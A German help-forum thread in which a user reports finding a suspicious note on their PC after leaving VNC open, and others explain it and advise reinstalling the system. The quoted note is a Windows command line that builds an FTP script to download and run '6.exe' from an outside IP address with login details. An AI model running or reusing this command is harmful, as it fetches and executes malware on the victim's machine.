Gehackt worden?

[vertin]

Hallo

Ich bin heute heimgekommen, an PC gehockt, und was seh ich? Irgendjemand hat eine neue Notiz erstellt in der steht:

/c echo open 90.150.218.178 31949 >> ik &echo user Coded 123654 >> ik &echo get 6.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &6.exe &exit

Ich hab VNC an meinem Rechner installiert, dass ich auch von der Arbeit aus auf den PC zugreifen kann (mit einem guten Passwort geschützt)! Ich hab keine ahnung was das in der Notiz zu bedeuten hat! An meinem PC hat sich soweit nichts geändert. Trotzdem hab ich etwas schiss, dass irgendwer z.b. an meinen Cookies rumgespielt oder einen trojaner installiert hat.

VNC hab ich sofort gelöscht. Kann mir jemand helfen? wie kann ich erkennen ob irgend ein Trojaner auf meiner Platte ist?

mfg

 

[VD]

Wie du erkennen kannst ob du n Trojaner hast?

Vllt. mal virenprogramm laufen lassen.
Und ja du wurdest gehackt.
Sieht zumindest stark danach aus wenn ich "ik &echo" lese.

 

[vertin]

hab nen antivieren programm.. aber wenn der trojaner selbstgeschrieben ist, keine ahnung ob der antivieren client das erkennt.

kannst du mir auch sagen was das bedeutet ?

 

[VD]

Nein kann ich nicht.
Aber hier bei CB dürften ne Menge leute sein, die das können.
Das mit dem echo kram hatten wir mal in der Schule, das ist auf jedenfall ein Befehl.
Und "user" "get" und "ftp" sieht danach aus, als wollte er irgendwas mit einem ftp server machen.
Hast du sowas?

Aber warte lieber mal auf andere Antworten. Ich bin wirklich kein Experte auf dem Gebiet.

 

[el.com]

Ich kenn mich mit Batch auch nicht so gut aus, aber das sieht mir sehr nach einem Befehl aus, der versucht vom Server 90.150.218.178 per FTP eine Datei namens 6.exe zu laden... Frag mal im Programmierforum hier auf CB nach, die werden dir mit Sicherheit sagen können, was der Befehl genau macht.

Setz das System sicherheitshalber mal neu auf. Das Teil wird jetzt sicherlich kompromittiert sein.

 

[LinuxNoob]

Hallo,

der von dir beschriebene Vorgang findet man zunächst häufiger bei VNC.

Nach Erfahrung sage ich hier, dass es sich um einen Bot handelt, der sein unwesen treibt und es in dieser Form seit 2-3 Jahren tut.

Es handelt sich um eine Malware Geschichte. Geschickt wird die Malware nicht "an die Shell", sondern schreibt sie ins Terminalfenster, wo die Bash sie dann als Benutzereingaben interpretiert. Das ist ein ziemlich ungewöhnlicher Weg, um Befehle auszuführen, denn normalerweise ist es doch viel einfacher und unauffälliger zu forken und den Befehl ohne Terminal auszuführen.

Folglich dürfte es dem Bot gelungen sein sich auf deinem System Zugang zu verschaffen.
Fazit: Vom Netz nehmen, Backup einspielen, Konfiguration verbessern

 

[vertin]

ich nehme mal an dies ist der port an den mein rechner zugreifen sollte: 31949

dieser port ist bei mir gesperrt!

Ich denke mal es war so: Ein User hat sich irgendwie Zugriff auf meinen Rechner verschafft per VNC. Seit dem ich aber dieses Antivirus Dings von Microsoft habe, konnte ich selber keine Buttons in der Taskleiste ausführen (keine Ahnung warum, wollte es deswegen auch ziemlich bald deinstallieren). Der User konnte anscheinend nur etwas in meinen Notizen schreiben und hat irgendwie versucht von dort aus einen cmd befehl zu aktivieren. Für mich macht das nämlich überhaupt keinen Sinn soetwas in die Notiz zu schreiben. Egal, auf jeden Fall hat er irgendwas mit den Notizen versucht, da er in irgendeiner Art machtlos war (meine Meinung). Ich hab mein Rechner auf Veränderungen überprüft: Änderungsdaten, Löschdaten usw.. es gab nur wenige erklärliche Ausnahmen die in der Zeit als ich abwesend war ausgeführt wurden, sowas wie: antivirus Update, MSN Nachrichtenverlauf, da mir einer geschrieben hat. Netstat hat mir auch keine IP angezeigt mit der ich verbunden war, die vll. verdächtig gewesen wäre. Vollständiger Virenscan, keine Ergebnisse. Verdächtige Prozesse?Nein! Noch dazu hab ich mir ein Searchtool runtergeladen und hab alle Daten und deren Inhalt überprüfen lassen ob sich in irgendwo die obengenannte IP wieder findet - Fehlanzeige.

Glück im Unglück dank MS?

 

[el.com]

Ich würd mich nicht darauf verlassen. Du weißt nie 100%ig, was genau er erreicht hat. Setz das System neu auf, sonst bist du nachher noch diverse Accounts oder dank Onlinebanking dein Geld los.

 

[nekro1]

Ganz klares neuaufsetzen!

Sicherheit steht IMMER an ERSTER STELLE!

 

[Jontheriver]

ich nehme mal an dies ist der port an den mein rechner zugreifen sollte: 31949

dieser port ist bei mir gesperrt!

das ist acuh der port von dem rechner von dem sich deiner die exe datei ziehen soll
(russische dial up range..)